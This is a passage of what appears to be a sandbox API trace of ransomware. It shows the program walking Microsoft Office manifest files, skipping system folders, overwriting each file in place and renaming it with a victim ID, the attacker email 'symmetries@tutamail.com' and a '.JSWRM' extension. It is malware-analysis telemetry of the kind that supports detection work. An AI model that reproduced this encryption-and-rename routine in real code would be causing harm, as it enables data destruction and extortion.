ftLastWriteTime.dwLowDateTime=0x84214453, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xeaa, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml", cAlternateFileName="AP202C~1.XML")) returned 1 [0072.871] lstrcmpiW (lpString1="AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml", lpString2=".") returned 1 [0072.871] lstrcmpiW (lpString1="AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml", lpString2="..") returned 1 [0072.871] lstrcmpiW (lpString1="AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml", lpString2="...") returned 1 [0072.871] lstrcmpiW (lpString1="AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml", lpString2="windows") returned -1 [0072.871] lstrcmpiW (lpString1="AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml", lpString2="recovery") returned -1 [0072.871] lstrcmpiW (lpString1="AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml", lpString2="perflogs") returned -1 [0072.871] lstrcmpiW (lpString1="AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml", lpString2="documents and settings") returned -1 [0072.871] lstrcmpiW (lpString1="AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml", lpString2="$RECYCLE.BIN") returned 1 [0072.871] lstrcmpiW (lpString1="AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml", lpString2="system volume information") returned -1 [0072.872] lstrcmpiW (lpString1="AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml", lpString2="msocache") returned -1 [0072.872] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209440 [0072.872] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0072.872] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0072.872] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x20e418, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 53 [0072.872] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209440 | out: hHeap=0x1e0000) returned 1 [0072.872] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209440 [0072.872] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0072.872] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0072.872] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x20de78, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 53 [0072.872] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209440 | out: hHeap=0x1e0000) returned 1 [0072.872] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b820 [0072.872] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b398 | out: hHeap=0x1e0000) returned 1 [0072.872] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0072.872] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345efcc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0072.872] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b568 [0072.872] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e2-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0072.872] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345ef60 | out: lpFileSize=0x345ef60*=3754) returned 1 [0072.872] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.872] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xea0) returned 0x213678 [0072.872] ReadFile (in: hFile=0x458, lpBuffer=0x213678, nNumberOfBytesToRead=0xea0, lpNumberOfBytesRead=0x345ef6c, lpOverlapped=0x0 | out: lpBuffer=0x213678*, lpNumberOfBytesRead=0x345ef6c*=0xea0, lpOverlapped=0x0) returned 1 [0072.874] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.874] WriteFile (in: hFile=0x458, lpBuffer=0x213678*, nNumberOfBytesToWrite=0xea0, lpNumberOfBytesWritten=0x345ef68, lpOverlapped=0x0 | out: lpBuffer=0x213678*, lpNumberOfBytesWritten=0x345ef68*=0xea0, lpOverlapped=0x0) returned 1 [0072.874] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x213678 | out: hHeap=0x1e0000) returned 1 [0072.874] CloseHandle (hObject=0x458) returned 1 [0072.874] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ad40 [0072.874] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0072.874] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0072.874] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0072.874] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0072.874] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0072.874] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0072.874] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0072.875] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0072.875] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0072.875] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b2b0 [0072.875] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x1ff448 [0072.875] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b2b0 | out: hHeap=0x1e0000) returned 1 [0072.875] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0072.875] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e2-0000-1000-0000000ff1ce.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e2-0000-1000-0000000ff1ce.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0072.875] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0072.876] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ad40 | out: hHeap=0x1e0000) returned 1 [0072.876] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b568 | out: hHeap=0x1e0000) returned 1 [0072.876] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0072.876] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0072.876] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x8396fbd3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x8396fbd3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x84391d75, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4ed, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml", cAlternateFileName="APBC30~1.XML")) returned 1 [0072.876] lstrcmpiW (lpString1="AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml", lpString2=".") returned 1 [0072.876] lstrcmpiW (lpString1="AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml", lpString2="..") returned 1 [0072.876] lstrcmpiW (lpString1="AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml", lpString2="...") returned 1 [0072.876] lstrcmpiW (lpString1="AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml", lpString2="windows") returned -1 [0072.876] lstrcmpiW (lpString1="AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml", lpString2="recovery") returned -1 [0072.876] lstrcmpiW (lpString1="AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml", lpString2="perflogs") returned -1 [0072.876] lstrcmpiW (lpString1="AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml", lpString2="documents and settings") returned -1 [0072.876] lstrcmpiW (lpString1="AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml", lpString2="$RECYCLE.BIN") returned 1 [0072.876] lstrcmpiW (lpString1="AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml", lpString2="system volume information") returned -1 [0072.876] lstrcmpiW (lpString1="AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml", lpString2="msocache") returned -1 [0072.877] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209350 [0072.877] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0072.877] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0072.877] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x20e268, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 53 [0072.877] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209350 | out: hHeap=0x1e0000) returned 1 [0072.877] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209440 [0072.877] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0072.877] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0072.877] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x20e418, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 53 [0072.877] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209440 | out: hHeap=0x1e0000) returned 1 [0072.877] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b0e0 [0072.877] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b820 | out: hHeap=0x1e0000) returned 1 [0072.877] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0072.877] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345efcc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0072.877] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22aff8 [0072.877] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e2-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0072.877] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345ef60 | out: lpFileSize=0x345ef60*=1261) returned 1 [0072.877] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.877] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4e0) returned 0x203550 [0072.877] ReadFile (in: hFile=0x458, lpBuffer=0x203550, nNumberOfBytesToRead=0x4e0, lpNumberOfBytesRead=0x345ef6c, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesRead=0x345ef6c*=0x4e0, lpOverlapped=0x0) returned 1 [0072.879] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.879] WriteFile (in: hFile=0x458, lpBuffer=0x203550*, nNumberOfBytesToWrite=0x4e0, lpNumberOfBytesWritten=0x345ef68, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesWritten=0x345ef68*=0x4e0, lpOverlapped=0x0) returned 1 [0072.879] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x203550 | out: hHeap=0x1e0000) returned 1 [0072.879] CloseHandle (hObject=0x458) returned 1 [0072.879] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b568 [0072.879] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0072.879] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0072.879] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0072.879] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0072.879] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0072.879] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0072.879] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0072.879] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0072.879] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0072.879] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b908 [0072.879] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x1ff448 [0072.880] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b908 | out: hHeap=0x1e0000) returned 1 [0072.880] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0072.880] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e2-0409-1000-0000000ff1ce.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e2-0409-1000-0000000ff1ce.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0072.880] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0072.880] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b568 | out: hHeap=0x1e0000) returned 1 [0072.880] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22aff8 | out: hHeap=0x1e0000) returned 1 [0072.880] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0072.880] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0072.880] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x8394994f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x8394994f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x84214453, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4ed, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml", cAlternateFileName="APCB35~1.XML")) returned 1 [0072.880] lstrcmpiW (lpString1="AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml", lpString2=".") returned 1 [0072.880] lstrcmpiW (lpString1="AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml", lpString2="..") returned 1 [0072.880] lstrcmpiW (lpString1="AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml", lpString2="...") returned 1 [0072.880] lstrcmpiW (lpString1="AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml", lpString2="windows") returned -1 [0072.880] lstrcmpiW (lpString1="AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml", lpString2="recovery") returned -1 [0072.881] lstrcmpiW (lpString1="AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml", lpString2="perflogs") returned -1 [0072.881] lstrcmpiW (lpString1="AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml", lpString2="documents and settings") returned -1 [0072.881] lstrcmpiW (lpString1="AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml", lpString2="$RECYCLE.BIN") returned 1 [0072.881] lstrcmpiW (lpString1="AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml", lpString2="system volume information") returned -1 [0072.881] lstrcmpiW (lpString1="AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml", lpString2="msocache") returned -1 [0072.881] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209878 [0072.881] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0072.881] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0072.881] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x20e268, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 53 [0072.881] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209878 | out: hHeap=0x1e0000) returned 1 [0072.881] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209350 [0072.881] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0072.881] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0072.881] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x20de78, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 53 [0072.881] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209350 | out: hHeap=0x1e0000) returned 1 [0072.881] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b398 [0072.881] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b0e0 | out: hHeap=0x1e0000) returned 1 [0072.881] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0072.881] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345efcc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0072.881] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22aff8 [0072.881] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0115-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0072.881] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345ef60 | out: lpFileSize=0x345ef60*=1261) returned 1 [0072.881] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.881] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4e0) returned 0x203550 [0072.881] ReadFile (in: hFile=0x458, lpBuffer=0x203550, nNumberOfBytesToRead=0x4e0, lpNumberOfBytesRead=0x345ef6c, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesRead=0x345ef6c*=0x4e0, lpOverlapped=0x0) returned 1 [0072.883] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.883] WriteFile (in: hFile=0x458, lpBuffer=0x203550*, nNumberOfBytesToWrite=0x4e0, lpNumberOfBytesWritten=0x345ef68, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesWritten=0x345ef68*=0x4e0, lpOverlapped=0x0) returned 1 [0072.883] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x203550 | out: hHeap=0x1e0000) returned 1 [0072.883] CloseHandle (hObject=0x458) returned 1 [0072.883] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22af10 [0072.883] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0072.883] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0072.883] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0072.883] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0072.883] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0072.884] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0072.884] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0072.884] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0072.884] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0072.884] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b820 [0072.884] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x1ff448 [0072.884] HeapFree (in: 